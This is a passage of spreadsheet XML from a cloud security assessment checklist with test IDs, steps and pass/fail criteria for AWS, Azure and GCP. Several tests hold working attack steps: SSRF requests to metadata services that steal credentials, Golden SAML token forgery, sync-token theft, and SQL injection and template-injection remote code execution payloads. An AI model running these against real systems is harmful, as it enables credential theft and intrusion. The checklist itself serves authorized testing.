    <t>Test whether SSRF vulnerabilities in AWS-hosted applications can be exploited to access the EC2 metadata service and steal temporary IAM role credentials.</t>
  </si>
  <si>
    <t>1. Find SSRF point: test params url, redirect, src, fetch, proxy, api, document
2. Test IMDS connectivity: curl -s "https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/"
3. Get role name: curl -s "https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
4. Steal credentials: curl -s "https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/&lt;ROLE-NAME&gt;"
5. Use stolen creds: export AWS_ACCESS_KEY_ID=&lt;stolen&gt;; aws sts get-caller-identity</t>
  </si>
  <si>
    <t>Pass: SSRF to 169.254.169.254 is blocked by WAF or application. IMDSv2 enforced (401 without PUT token). Fail: SSRF enables retrieval of live IAM credentials from the metadata service.</t>
  </si>
  <si>
    <t>CSEC-CRED-002</t>
  </si>
  <si>
    <t>SSRF to Azure IMDS Managed Identity Token Theft</t>
  </si>
  <si>
    <t>Test SSRF vulnerabilities in Azure-hosted applications to steal Managed Identity access tokens from the Azure Instance Metadata Service, enabling unauthenticated access to Azure resources.</t>
  </si>
  <si>
    <t>curl, Burp Suite, Azure PowerShell</t>
  </si>
  <si>
    <t>1. Test SSRF to Azure IMDS: curl -s "https://target-app.azurewebsites.net/proxy?url=http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&amp;resource=https://management.azure.com/" -H "Metadata: true"
2. Get Key Vault token: url=http://169.254.169.254/...&amp;resource=https://vault.azure.net
3. Get Graph token: url=http://169.254.169.254/...&amp;resource=https://graph.microsoft.com/
4. Use stolen token: Connect-AzAccount -AccessToken &lt;token&gt; -AccountId &lt;client-id&gt;
5. Get storage keys: Get-AzStorageAccountKey -ResourceGroupName &lt;rg&gt; -AccountName &lt;account&gt;</t>
  </si>
  <si>
    <t>Pass: SSRF to 169.254.169.254 is blocked. Application has no Managed Identity or network blocks IMDS access. Fail: SSRF yields a live Azure Bearer token enabling access to Azure resources without credentials.</t>
  </si>
  <si>
    <t>CSEC-CRED-003</t>
  </si>
  <si>
    <t>SSRF to GCP Metadata Server Credential Theft</t>
  </si>
  <si>
    <t>Test SSRF vulnerabilities in GCP-hosted applications to steal service account OAuth tokens from the GCP metadata server, enabling access to GCP APIs.</t>
  </si>
  <si>
    <t>curl, Burp Suite, gcloud CLI</t>
  </si>
  <si>
    <t>1. Test connectivity: curl -s "https://target.appspot.com/fetch?url=http://metadata.google.internal/computeMetadata/v1/" -H "Metadata-Flavor: Google"
2. Get service accounts: url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/
3. Steal OAuth token: url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
4. Use token: curl -H "Authorization: Bearer &lt;token&gt;" "https://storage.googleapis.com/storage/v1/b?project=&lt;proj&gt;"
5. List GCE instances: curl -H "Authorization: Bearer &lt;token&gt;" "https://compute.googleapis.com/compute/v1/projects/&lt;proj&gt;/aggregated/instances"</t>
  </si>
  <si>
    <t>Pass: GCP metadata server is inaccessible via SSRF. Application firewall blocks 169.254.169.254 and metadata.google.internal. Fail: Service account OAuth token is stolen via SSRF, granting access to GCP APIs.</t>
  </si>
  <si>
    <t>CSEC-CRED-004</t>
  </si>
  <si>
    <t>Lambda Environment Variable Secrets Exposure</t>
  </si>
  <si>
    <t>Check whether Lambda functions store sensitive credentials (database passwords, API keys, JWT secrets) in environment variables readable by anyone with GetFunctionConfiguration permission.</t>
  </si>
  <si>
    <t>1. List functions: aws lambda list-functions --output table
2. Get env vars: aws lambda get-function-configuration --function-name &lt;name&gt; --query "Environment.Variables"
3. Loop all functions: for fn in $(aws lambda list-functions --query 'Functions[].FunctionName' --output text); do echo "=== $fn ==="; aws lambda get-function-configuration --function-name $fn --query 'Environment.Variables' --output json 2&gt;/dev/null; done
4. Download code: wget -O code.zip "$(aws lambda get-function --function-name &lt;name&gt; --query 'Code.Location' --output text)"
5. Search code: grep -rniE "password|secret|api_key|token" ./function-code/</t>
  </si>
  <si>
    <t>Pass: No sensitive values in environment variables. Secrets retrieved at runtime from Secrets Manager. Fail: Database passwords, API keys, or credentials found in Lambda environment variables.</t>
  </si>
  <si>
    <t>CSEC-CRED-005</t>
  </si>
  <si>
    <t>Cognito Identity Pool Unauthenticated Credential Issuance</t>
  </si>
  <si>
    <t>Test whether Cognito Identity Pools with AllowUnauthenticatedIdentities=true issue live AWS credentials without any login, and assess the permissions of the unauthenticated role.</t>
  </si>
  <si>
    <t>AWS CLI</t>
  </si>
  <si>
    <t>1. List identity pools: aws cognito-identity list-identity-pools --max-results 60 --output table
2. Describe pool: aws cognito-identity describe-identity-pool --identity-pool-id &lt;id&gt; | grep AllowUnauthenticatedIdentities
3. Get identity: IDENTITY_ID=$(aws cognito-identity get-id --identity-pool-id &lt;id&gt; --account-id &lt;acct&gt; --query IdentityId --output text)
4. Get credentials: aws cognito-identity get-credentials-for-identity --identity-id $IDENTITY_ID
5. Test permissions: export AWS_ACCESS_KEY_ID=&lt;returned&gt;; aws sts get-caller-identity; aws s3 ls; aws ec2 describe-instances</t>
  </si>
  <si>
    <t>Pass: AllowUnauthenticatedIdentities is false. Unauthenticated users cannot obtain AWS credentials. Fail: Live AWS credentials are issued without any authentication, potentially granting access to cloud resources.</t>
  </si>
  <si>
    <t>Phase 6: AWS, Azure &amp; GCP Platform-Specific Attack Testing</t>
  </si>
  <si>
    <t>CSEC-AWS-001</t>
  </si>
  <si>
    <t>AWS CloudTrail Configuration and Integrity Assessment</t>
  </si>
  <si>
    <t>Verify CloudTrail is enabled in all regions with multi-region trail, log file validation, and that logs are protected from deletion or tampering.</t>
  </si>
  <si>
    <t>1. Run: aws cloudtrail describe-trails --include-shadow-trails --query "trailList[*].{Name:Name,MultiRegion:IsMultiRegionTrail,LogValidation:LogFileValidationEnabled,GlobalEvents:IncludeGlobalServiceEvents}"
2. Check status: aws cloudtrail get-trail-status --name &lt;trail-name&gt;
3. Check S3 bucket: aws s3api get-object-lock-configuration --bucket &lt;ct-log-bucket&gt;
4. Run: prowler aws --checks cloudtrail_multi_region_enabled cloudtrail_log_file_validation_enabled
5. Check GuardDuty: aws guardduty list-detectors</t>
  </si>
  <si>
    <t>Pass: Multi-region trail enabled. Log validation enabled. Logs in locked S3 bucket. GuardDuty enabled in all regions. Fail: CloudTrail not multi-region, log validation disabled, or logs in unprotected bucket.</t>
  </si>
  <si>
    <t>CSEC-AWS-002</t>
  </si>
  <si>
    <t>AWS IAM Role Trust Policy Cross-Account Analysis</t>
  </si>
  <si>
    <t>Identify IAM roles with trust policies that allow external AWS accounts, wildcard principals, or overly broad OIDC trust conditions that could allow unauthorized role assumption.</t>
  </si>
  <si>
    <t>AWS CLI, PMapper</t>
  </si>
  <si>
    <t>1. Run: aws iam list-roles --query 'Roles[*].{Name:RoleName,Trust:AssumeRolePolicyDocument}' --output json | python3 (filter for external accounts, *, Federated)
2. Check OIDC providers: aws iam list-open-id-connect-providers
3. Get OIDC provider details: aws iam get-open-id-connect-provider --open-id-connect-provider-arn &lt;arn&gt;
4. Look for overly broad sub claims: "token.actions.githubusercontent.com:sub": "repo:*" (should be repo-specific)
5. Check for wildcard trust: aws iam get-role --role-name &lt;name&gt; --query 'Role.AssumeRolePolicyDocument'</t>
  </si>
  <si>
    <t>Pass: All role trust policies restrict to specific accounts or specific OIDC subjects. No wildcard principals. Fail: Roles trust external accounts broadly, have wildcard principals (*), or OIDC trust allows any workflow.</t>
  </si>
  <si>
    <t>CSEC-AWS-003</t>
  </si>
  <si>
    <t>AWS Cognito User Pool Security Assessment</t>
  </si>
  <si>
    <t>Test Amazon Cognito User Pools for user enumeration via sign-up/login error responses, weak password policies, missing MFA, and insecure authentication flows.</t>
  </si>
  <si>
    <t>AWS CLI, Burp Suite</t>
  </si>
  <si>
    <t>1. Describe pool: aws cognito-idp describe-user-pool --user-pool-id &lt;id&gt; | grep -E "PasswordPolicy|MfaConfiguration"
2. Test user enum via sign-up: aws cognito-idp sign-up --client-id &lt;id&gt; --username existing_user --password Test123! --user-attributes Name=email,Value=test@test.com (check for UsernameExistsException)
3. Test user enum via login: aws cognito-idp initiate-auth --auth-flow USER_PASSWORD_AUTH --auth-parameters USERNAME=nonexistent,PASSWORD=wrong --client-id &lt;id&gt; (check error message differs)
4. Check explicit auth flows: aws cognito-idp describe-user-pool-client --user-pool-id &lt;id&gt; --client-id &lt;id&gt; | grep ExplicitAuthFlows</t>
  </si>
  <si>
    <t>Pass: Error messages are identical for valid/invalid users. MFA enforced. Strong password policy. Fail: Error messages differ for valid vs invalid users enabling enumeration. MFA not enforced.</t>
  </si>
  <si>
    <t>CSEC-AZURE-001</t>
  </si>
  <si>
    <t>Azure Storage Account HTTPS and TLS Enforcement</t>
  </si>
  <si>
    <t>Verify Azure storage accounts enforce HTTPS-only access with minimum TLS 1.2, and that HTTP access is blocked to prevent credential interception.</t>
  </si>
  <si>
    <t>Azure CLI, Prowler</t>
  </si>
  <si>
    <t>1. Run: az storage account list --query "[*].{Name:name,HTTPS:enableHttpsTrafficOnly,TLS:minimumTlsVersion,PublicAccess:allowBlobPublicAccess}" --output table
2. Run: prowler azure --checks storage_secure_transfer_to_storage_accounts_enabled
3. Check TLS: prowler azure --checks storage_min_tls_version_is_1_2
4. Test HTTP access: curl -s http://&lt;account&gt;.blob.core.windows.net/ (should redirect or fail)
5. Run: prowler azure --checks storage_blob_public_access_level_is_disabled</t>
  </si>
  <si>
    <t>Pass: enableHttpsTrafficOnly=true, minimumTlsVersion=TLS1_2 on all storage accounts. HTTP access blocked. Fail: Any storage account allows HTTP traffic or uses TLS &lt; 1.2.</t>
  </si>
  <si>
    <t>CSEC-AZURE-002</t>
  </si>
  <si>
    <t>Azure Key Vault Access Policy and Network Controls</t>
  </si>
  <si>
    <t>Assess Azure Key Vault access policies for overly permissive grants, verify soft delete and purge protection are enabled, and check network access restrictions.</t>
  </si>
  <si>
    <t>1. List vaults: az keyvault list --output table
2. Check access policies: az keyvault show --name &lt;vault&gt; --query "{AccessPolicies:properties.accessPolicies,NetworkRules:properties.networkAcls}" --output json
3. List secrets if accessible: az keyvault secret list --vault-name &lt;vault&gt;
4. Run: prowler azure --checks keyvault_soft_delete_is_enabled keyvault_purge_protection_is_enabled
5. Check network rules: verify defaultAction is Deny with specific IP allow-list</t>
  </si>
  <si>
    <t>Pass: Key Vault access policies follow least privilege. Soft delete and purge protection enabled. Network restricted to specific IPs/VNets. Fail: Broad access policies, no soft delete, or unrestricted network access.</t>
  </si>
  <si>
    <t>CSEC-GCP-001</t>
  </si>
  <si>
    <t>GCP IAM Overly Permissive Role Binding Detection</t>
  </si>
  <si>
    <t>Identify GCP IAM bindings that grant primitive roles (Owner, Editor, Viewer) at project level to external users or service accounts, or any binding for allUsers.</t>
  </si>
  <si>
    <t>1. Get project policy: gcloud projects get-iam-policy &lt;project-id&gt; --format=json
2. Check for primitive roles: grep -E 'roles/owner|roles/editor' (on external accounts)
3. Check allUsers: grep 'allUsers' (critical finding)
4. Check allAuthenticatedUsers: grep 'allAuthenticatedUsers'
5. Run GCP Scanner: python3 scanner.py -k /path/to/key.json -o ./results/
6. List service account keys: gcloud iam service-accounts keys list --iam-account &lt;sa-email&gt;</t>
  </si>
  <si>
    <t>Pass: No allUsers bindings. No primitive roles on external accounts. Service account keys are system-managed only. Fail: allUsers has any permission, or external accounts have Owner/Editor roles.</t>
  </si>
  <si>
    <t>Phase 7: Advanced Cloud Identity Attacks (SAML, MitC, OIDC)</t>
  </si>
  <si>
    <t>CSEC-IDENTITY-001</t>
  </si>
  <si>
    <t>Golden SAML Attack — ADFS Token Signing Certificate Theft</t>
  </si>
  <si>
    <t>Test whether the ADFS token-signing certificate can be extracted and used to forge SAML assertions for any user, achieving persistent, password-independent access to all federated cloud services.</t>
  </si>
  <si>
    <t>ADFSpoof, Mimikatz, AWS CLI</t>
  </si>
  <si>
    <t>1. On ADFS server (admin): Get-AdfsCertificate -CertificateType Token-Signing | Select-Object Certificate
2. Export cert: certutil -exportpfx -p "password" My &lt;thumbprint&gt; adfs_signing.pfx
3. Get ADFS issuer: Get-AdfsProperties | Select-Object Identifier
4. Forge SAML token: python3 ADFSpoof.py -b adfs_signing.pfx -s https://adfs.target.com/adfs/services/trust --nameid phantom.admin@target.com --attribute 'https://aws.amazon.com/SAML/Attributes/Role' 'arn:aws:iam::&lt;acct&gt;:role/ADFS-Admin,arn:aws:iam::&lt;acct&gt;:saml-provider/ADFS' -o forged.xml
5. Exchange: aws sts assume-role-with-saml --role-arn &lt;arn&gt; --principal-arn &lt;arn&gt; --saml-assertion $(base64 -w0 forged.xml)</t>
  </si>
  <si>
    <t>Pass: ADFS certificate is stored in HSM and non-exportable. Forged token rejected. Azure AD Conditional Access blocks anomalous logins. Fail: Signing certificate exportable. Forged SAML token accepted by AWS/Azure granting admin access.</t>
  </si>
  <si>
    <t>CSEC-IDENTITY-002</t>
  </si>
  <si>
    <t>Man-in-the-Cloud (MitC) — Sync Token Replacement Attack</t>
  </si>
  <si>
    <t>Test whether cloud storage sync tokens (OneDrive, Google Drive, Dropbox) stored on disk can be stolen and replaced to gain persistent account access without the user's password.</t>
  </si>
  <si>
    <t>Windows Credential Manager, Python3, cloud sync clients</t>
  </si>
  <si>
    <t>1. Locate OneDrive tokens: dir "%LOCALAPPDATA%\Microsoft\OneDrive\settings\Business1\"
2. Extract credentials: cmdkey /list | findstr OneDrive
3. Google Drive token: locate SQLite DB at %LOCALAPPDATA%\Google\Drive\user_default\credentials
4. Extract refresh token from SQLite: python3 -c "import sqlite3; c=sqlite3.connect('credentials'); print(list(c.execute('SELECT * FROM config')))"
5. Get new access token: curl -X POST https://oauth2.googleapis.com/token -d refresh_token=&lt;stolen&gt;&amp;grant_type=refresh_token&amp;client_id=&lt;id&gt;&amp;client_secret=&lt;secret&gt;
6. List files: curl -H "Authorization: Bearer &lt;new-token&gt;" https://www.googleapis.com/drive/v3/files</t>
  </si>
  <si>
    <t>Pass: Sync tokens are encrypted with OS DPAPI. Cloud provider detects token use from new device/IP and revokes. Fail: Stolen sync token provides persistent cloud account access surviving password changes.</t>
  </si>
  <si>
    <t>CSEC-IDENTITY-003</t>
  </si>
  <si>
    <t>Cross-Cloud OIDC Trust Misconfiguration Testing</t>
  </si>
  <si>
    <t>Test whether OIDC-based trust relationships (GitHub Actions to AWS, GCP Workload Identity to AWS) have overly broad subject claim conditions allowing unauthorized workloads to assume cloud roles.</t>
  </si>
  <si>
    <t>AWS CLI, curl, GitHub Actions</t>
  </si>
  <si>
    <t>1. List OIDC providers: aws iam list-open-id-connect-providers
2. Inspect each provider: aws iam get-open-id-connect-provider --open-id-connect-provider-arn &lt;arn&gt;
3. Check role trust policy: aws iam get-role --role-name &lt;name&gt; --query 'Role.AssumeRolePolicyDocument' --output json
4. Look for vulnerable sub condition: 'token.actions.githubusercontent.com:sub': 'repo:*' (should be specific repo)
5. Test from GitHub Actions (if in scope): request JWT and call aws sts assume-role-with-web-identity
6. Check GCP Workload Identity: gcloud iam workload-identity-pools list --location=global</t>
  </si>
  <si>
    <t>Pass: OIDC trust conditions restrict to specific repository, branch, and environment. No wildcard sub claims. Fail: OIDC trust allows any GitHub repo or workflow to assume the cloud role.</t>
  </si>
  <si>
    <t>Phase 8: Serverless &amp; Lambda Security Testing</t>
  </si>
  <si>
    <t>CSEC-SLS-001</t>
  </si>
  <si>
    <t>Lambda Event Injection — SQL Injection via Event Data</t>
  </si>
  <si>
    <t>Test Lambda functions for SQL injection vulnerabilities delivered through structured event data from API Gateway, SQS, or other event sources rather than traditional HTTP parameters.</t>
  </si>
  <si>
    <t>AWS CLI, curl, Burp Suite</t>
  </si>
  <si>
    <t>1. Identify event schema: aws lambda invoke --function-name &lt;fn&gt; --payload '{"username": "testuser"}' --cli-binary-format raw-in-base64-out response.json
2. Classic SQLi: payload '{"username": "admin'\'' OR '\'1'\'='\''1\''"}'
3. Union-based: payload '{"username": "x'\'' UNION SELECT table_name,2,3 FROM information_schema.tables--"}'
4. Time-based: time aws lambda invoke ... --payload '{"username": "x'\'' AND SLEEP(5)--"}'
5. Via API Gateway: curl -X POST https://&lt;api-id&gt;.execute-api.us-east-1.amazonaws.com/prod/users -d '{"username":"admin'\'' OR '\'1'\'='\''1--"}'</t>
  </si>
  <si>
    <t>Pass: All event data is treated as parameterized input. SQL injection payloads produce errors or no unusual behavior. Fail: SQL injection through event data alters database query behavior or returns unauthorized data.</t>
  </si>
  <si>
    <t>CSEC-SLS-002</t>
  </si>
  <si>
    <t>Lambda Server-Side Template Injection (SSTI) Testing</t>
  </si>
  <si>
    <t>Test Lambda functions using Jinja2 (Python) or EJS/Handlebars (Node.js) templating engines for SSTI vulnerabilities that can lead to remote code execution within the Lambda runtime.</t>
  </si>
  <si>
    <t>1. Test Jinja2 SSTI: aws lambda invoke --function-name &lt;fn&gt; --payload '{"name": "{{7*7}}"}' --cli-binary-format raw-in-base64-out ssti_1.json &amp;&amp; cat ssti_1.json (expect 49 if vulnerable)
2. RCE via Jinja2: payload '{"name": "{{config.__class__.__init__.__globals__[\"os\"].popen(\"id\").read()}}"}'
3. Test EJS (Node.js): payload '{"name": "&lt;%= 7*7 %&gt;"}'
4. EJS RCE: payload '{"name": "&lt;%= global.process.mainModule.require(\'child_process\').execSync(\'id\').toString() %&gt;"}'
5. Read Lambda credentials via SSTI: payload with 'env | grep AWS' command</t>
  </si>
  <si>
    <t>Pass: Template syntax is treated as literal strings. No code execution occurs. Fail: Template expressions evaluate (7*7=49) or remote code execution is achieved within the Lambda runtime.</t>
  </si>
  <si>
    <t>CSEC-SLS-003</t>
  </si>
  <si>
    <t>Lambda Dependency Vulnerability Assessment</t>
  </si>
  <si>
    <t>Download Lambda function deployment packages and scan all third-party dependencies for known CVEs using automated vulnerability scanners.</t>
  </si>
  <si>
    <t>AWS CLI, pip-audit, npm audit, Snyk, Trivy</t>
  </si>
  <si>
    <t>1. Download: CODE_URL=$(aws lambda get-function --function-name &lt;name&gt; --query 'Code.Location' --output text); wget -O code.zip "$CODE_URL"
2. Extract: unzip code.zip -d ./function-analysis/
3. Python scan: pip-audit -r ./function-analysis/requirements.txt --output json &gt; py-audit.json
4. Node scan: cd ./function-analysis/; npm audit --json &gt; npm-audit.json
5. Search for hardcoded secrets: grep -rniE "password|secret|api_key|AKIA" ./function-analysis/ --include="*.py" --include="*.js"
6. Trivy scan: trivy fs ./function-analysis/ --severity CRITICAL,HIGH</t>
  </si>
  <si>
    <t>Pass: No critical or high CVEs in dependencies. No hardcoded credentials in function code. Fail: Critical CVEs in dependencies or hardcoded credentials found in Lambda source code.</t>
  </si>
  <si>
    <t>CSEC-SLS-004</t>
  </si>
  <si>
    <t>Lambda IAM Execution Role Over-Privilege Assessment</t>
  </si>
  <si>
    <t>Identify Lambda functions with overly permissive IAM execution roles that exceed the minimum permissions required for function operation.</t>
  </si>
  <si>
    <t>AWS CLI, Prowler, PMapper</t>
  </si>
  <si>
    <t>1. Get function role: aws lambda get-function-configuration --function-name &lt;fn&gt; --query 'Role'
2. Get role policies: aws iam list-attached-role-policies --role-name &lt;role&gt;; aws iam list-role-policies --role-name &lt;role&gt;
3. Get policy document: aws iam get-policy-version --policy-arn &lt;arn&gt; --version-id v1
4. Identify over-privilege: look for Action: '*' or Resource: '*' in Lambda roles
5. Check for admin roles: grep -E 'AdministratorAccess|PowerUserAccess' (critical if Lambda has these)
6. Simulate permissions: aws iam simulate-principal-policy --policy-source-arn &lt;role-arn&gt; --action-names s3:* iam:* ec2:*</t>
  </si>
  <si>
    <t>Pass: Lambda execution roles have minimal permissions scoped to specific resources. No Lambda has admin-level permissions. Fail: Any Lambda function has AdministratorAccess or Action: '*' in its execution role.</t>
  </si>
  <si>
    <t>CSEC-SLS-005</t>
  </si>
  <si>
    <t>Azure Function and Serverless Security Assessment</t>
  </si>
  <si>
    <t>Assess Azure Function Apps for exposed function URLs with no authentication, hardcoded connection strings in application settings, and over-privileged managed identities.</t>
  </si>
  <si>
    <t>1. List function apps: az functionapp list --output table --query "[*].{Name:name,URL:defaultHostName,State:state}"
2. Check auth: az functionapp function show --function-name &lt;fn&gt; --name &lt;app&gt; --resource-group &lt;rg&gt; | grep authLevel (should not be anonymous)
3. Get app settings: az functionapp config appsettings list --name &lt;app&gt; --resource-group &lt;rg&gt; (look for hardcoded secrets)
4. Check managed identity: az functionapp identity show --name &lt;app&gt; --resource-group &lt;rg&gt;
5. Test function URL without key: curl https://&lt;app&gt;.azurewebsites.net/api/&lt;function&gt;
6. Check function URL config: az functionapp function keys list --function-name &lt;fn&gt; --name &lt;app&gt; --resource-group &lt;rg&gt;</t>
  </si>
  <si>
    <t>Pass: All functions require authentication (function key or managed identity). No secrets in app settings (use Key Vault references). Fail: Anonymous function URLs exist or secrets are hardcoded in application settings.</t>
  </si>
  <si>
    <t>Phase 9: Logging, Monitoring &amp; Detection Verification</t>
  </si>
  <si>
    <t>CSEC-LOG-001</t>
  </si>
  <si>
    <t>AWS CloudTrail Completeness and Coverage Verification</t>
  </si>
  <si>
    <t>Verify that AWS CloudTrail captures all management events across all regions, all services including global services, with log file integrity validation enabled.</t>
  </si>
  <si>
    <t>1. Run: aws cloudtrail describe-trails --include-shadow-trails --query "trailList[*].{Name:Name,MultiRegion:IsMultiRegionTrail,LogValidation:LogFileValidationEnabled,GlobalEvents:IncludeGlobalServiceEvents,S3Bucket:S3BucketName}" --output table
2. Check logging active: aws cloudtrail get-trail-status --name &lt;trail-name&gt; | grep IsLogging
3. Run: prowler aws --checks cloudtrail_multi_region_enabled cloudtrail_log_file_validation_enabled cloudtrail_s3_dataevents_read_enabled
4. Verify Object Lock: aws s3api get-object-lock-configuration --bucket &lt;ct-bucket&gt;</t>
  </si>
  <si>
    <t>Pass: Multi-region trail enabled. Log validation enabled. Global service events captured. S3 bucket has Object Lock. Fail: CloudTrail not multi-region, validation disabled, or log bucket unprotected.</t>
  </si>
  <si>
    <t>CSEC-LOG-002</t>
  </si>
  <si>
    <t>AWS GuardDuty and Security Hub Enablement Verification</t>
  </si>
  <si>
    <t>Verify that AWS GuardDuty is enabled in all regions and that AWS Security Hub is configured to aggregate security findings from all services.</t>
  </si>
  <si>
    <t>1. Check all regions: for region in $(aws ec2 describe-regions --query 'Regions[].RegionName' --output text); do echo -n "$region: "; aws guardduty list-detectors --region $region --query 'DetectorIds[0]' --output text; done
2. Check Security Hub: aws securityhub describe-hub
3. Check enabled standards: aws securityhub get-enabled-standards
4. Run: prowler aws --checks guardduty_is_enabled securityhub_enabled
5. Review findings: DETECTOR=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text); aws guardduty list-findings --detector-id $DETECTOR --finding-criteria '{"Criterion":{"severity":{"Gte":7}}}'</t>
  </si>
  <si>
    <t>Pass: GuardDuty enabled in all regions. Security Hub active with CIS and AWS standards enabled. Fail: GuardDuty not enabled in all regions or Security Hub not configured.</t>
  </si>
  <si>
    <t>CSEC-LOG-003</t>
  </si>
  <si>
    <t>CloudWatch Alerting for High-Risk Events</t>
  </si>
  <si>
    <t>Verify that CloudWatch metric filters and alarms exist for the CIS AWS Benchmark mandatory high-risk event categories including root account usage and IAM changes.</t>
  </si>
  <si>
    <t>1. List alarms: aws cloudwatch describe-alarms --query 'MetricAlarms[*].{Name:AlarmName,State:StateValue}' --output table
2. Check root alarm: aws cloudwatch describe-alarms --query "MetricAlarms[?contains(AlarmName,'root') || contains(MetricName,'RootAccountUsage')].AlarmName"
3. Run: prowler aws --checks cloudwatch_log_metric_filter_root_usage cloudwatch_log_metric_filter_iam_policy_changes cloudwatch_log_metric_filter_cloudtrail_configuration_changes cloudwatch_log_metric_filter_security_group_changes
4. Check metric filters: aws logs describe-metric-filters --log-group-name &lt;ct-log-group&gt;</t>
  </si>
  <si>
    <t>Pass: All CIS Benchmark 4.x monitoring alarms are active including root usage, IAM changes, CloudTrail changes, security group changes. Fail: Any required CIS alarm is missing.</t>
  </si>
  <si>
    <t>CSEC-LOG-004</t>
  </si>
  <si>
    <t>VPC Flow Log Enablement and Coverage</t>
  </si>
  <si>
    <t>Verify VPC Flow Logs are enabled for all VPCs in all regions, capturing ALL traffic types (not just REJECT), and delivered to CloudWatch Logs or S3 for analysis.</t>
  </si>
  <si>
    <t>1. Check all VPCs: for vpc in $(aws ec2 describe-vpcs --query 'Vpcs[].VpcId' --output text); do echo -n "VPC $vpc: "; aws ec2 describe-flow-logs --filter Name=resource-id,Values=$vpc --query 'FlowLogs[0].{Status:FlowLogStatus,Type:TrafficType}' --output text 2&gt;/dev/null || echo 'NO FLOW LOGS'; done
2. Verify ALL traffic type: aws ec2 describe-flow-logs --query 'FlowLogs[?TrafficType!=ALL]' --output table
3. Run: prowler aws --checks vpc_flow_logs_enabled</t>
  </si>
  <si>
    <t>Pass: Flow logs enabled on all VPCs. TrafficType=ALL. Logs delivered to protected S3 or CloudWatch Logs. Fail: Any VPC lacks flow logs or captures only ACCEPT or REJECT traffic.</t>
  </si>
  <si>
    <t>Phase 10: Compliance, Hardening &amp; Encryption Verification</t>
  </si>
  <si>
    <t>CSEC-HARD-001</t>
  </si>
  <si>
    <t>CIS AWS Benchmark Automated Compliance Assessment</t>
  </si>
  <si>
    <t>Run a comprehensive automated assessment of the AWS environment against the CIS AWS Foundations Benchmark v1.5 to identify all deviations from security baseline.</t>
  </si>
  <si>
    <t>Prowler, ScoutSuite, AWS Config</t>
  </si>
  <si>
    <t>1. Run full Prowler CIS scan: prowler aws --compliance cis_1.5_aws --output-formats html json csv --output-path ./cis-aws/
2. Run ScoutSuite: scout aws --profile &lt;profile&gt; --report-dir ./scoutsuite-report/
3. Review in browser: open ./scoutsuite-report/scoutsuite-report.html
4. Check top critical findings in prowler HTML report
5. Enable AWS Config: verify aws configservice describe-configuration-recorders
6. Check AWS Security Hub CIS standard: aws securityhub get-enabled-standards | grep cis</t>
  </si>
  <si>
    <t>Pass: CIS benchmark compliance above 90%. No Critical findings. All High findings have remediation plans. Fail: Critical findings exist in CIS Benchmark. Core controls (MFA, CloudTrail, encryption) failing.</t>
  </si>
  <si>
    <t>CSEC-HARD-002</t>
  </si>
  <si>
    <t>CIS Azure Benchmark Automated Compliance Assessment</t>
  </si>
  <si>
    <t>Run a comprehensive automated assessment of the Azure environment against CIS Azure Foundations Benchmark to identify security baseline deviations.</t>
  </si>
  <si>
    <t>Prowler, ScoutSuite, Microsoft Defender for Cloud</t>
  </si>
  <si>
    <t>1. Run Prowler Azure: prowler azure --az-cli-auth --subscription-ids &lt;id&gt; --compliance cis_2.0_azure --output-formats html json --output-path ./cis-azure/
2. Run ScoutSuite: scout azure --cli --subscription-ids &lt;id&gt; --report-dir ./scoutsuite-azure/
3. Check Microsoft Defender for Cloud: az security assessment list --output table
4. Check Secure Score: az security secure-score-controls list --output table
5. Run: prowler azure --checks iam_ensure_mfa_is_enabled_for_all_users storage_secure_transfer_to_storage_accounts_enabled keyvault_soft_delete_is_enabled</t>
  </si>
  <si>
    <t>Pass: CIS Azure benchmark compliance above 90%. Microsoft Defender for Cloud Secure Score above 80%. Fail: Critical CIS controls failing such as MFA, HTTPS enforcement, or Key Vault protections.</t>
  </si>
  <si>
    <t>CSEC-HARD-003</t>
  </si>
  <si>
    <t>CIS GCP Benchmark Automated Compliance Assessment</t>
  </si>
  <si>
    <t>Run a comprehensive automated assessment of the GCP environment against CIS GCP Foundations Benchmark to identify security baseline deviations.</t>
  </si>
  <si>
    <t>Prowler, ScoutSuite, GCP Security Command Center</t>
  </si>
  <si>
    <t>1. Run Prowler GCP: prowler gcp --project-ids &lt;id&gt; --compliance cis_3.0_gcp --output-formats html json --output-path ./cis-gcp/
2. Run ScoutSuite: scout gcp --user-account --project-id &lt;id&gt; --report-dir ./scoutsuite-gcp/
3. Check Security Command Center: gcloud scc findings list --organization=&lt;org-id&gt; --filter='state=ACTIVE AND severity=CRITICAL'
4. Run: prowler gcp --checks iam_sa_no_admin_privileges compute_firewall_rule_ssh_access_not_allowed_from_internet
5. Check audit logs: gcloud logging sinks list</t>
  </si>
  <si>
    <t>Pass: CIS GCP benchmark compliance above 90%. No critical firewall rules open to internet. Audit logging enabled for all services. Fail: Critical findings in firewall rules, IAM, or audit logging.</t>
  </si>
  <si>
    <t>CSEC-HARD-004</t>
  </si>
  <si>
    <t>Cloud Encryption at Rest Comprehensive Verification</t>
  </si>
  <si>
    <t>Verify that all data at rest across all cloud storage services (S3, RDS, EBS, Azure Storage, GCS) is encrypted using strong algorithms with properly managed keys.</t>
  </si>
  <si>
    <t>AWS CLI, Azure CLI, gcloud CLI, Prowler</t>
  </si>
  <si>
    <t>1. AWS S3: for bucket in $(aws s3 ls | awk '{print $3}'); do echo -n "$bucket: "; aws s3api get-bucket-encryption --bucket $bucket 2&gt;/dev/null || echo 'UNENCRYPTED'; done
2. AWS RDS: aws rds describe-db-instances --query 'DBInstances[*].{Name:DBInstanceIdentifier,Encrypted:StorageEncrypted}' --output table
3. AWS EBS: aws ec2 describe-volumes --query 'Volumes[*].{ID:VolumeId,Encrypted:Encrypted}' --output table; aws ec2 get-ebs-encryption-by-default
4. Azure: az storage account list --query '[*].{Name:name,Encryption:encryption}' --output table
5. Run: prowler aws --checks s3_bucket_default_encryption rds_instance_storage_encrypted ec2_ebs_volume_encryption_enabled</t>
  </si>
  <si>
    <t>Pass: All S3 buckets, RDS instances, EBS volumes use encryption. EBS encryption by default is enabled. Azure storage accounts use Microsoft or customer-managed keys. Fail: Any storage resource has encryption disabled.</t>
  </si>
  <si>
    <t>CSEC-HARD-005</t>
  </si>
  <si>
    <t>Kubernetes CIS Benchmark Assessment</t>
  </si>
  <si>
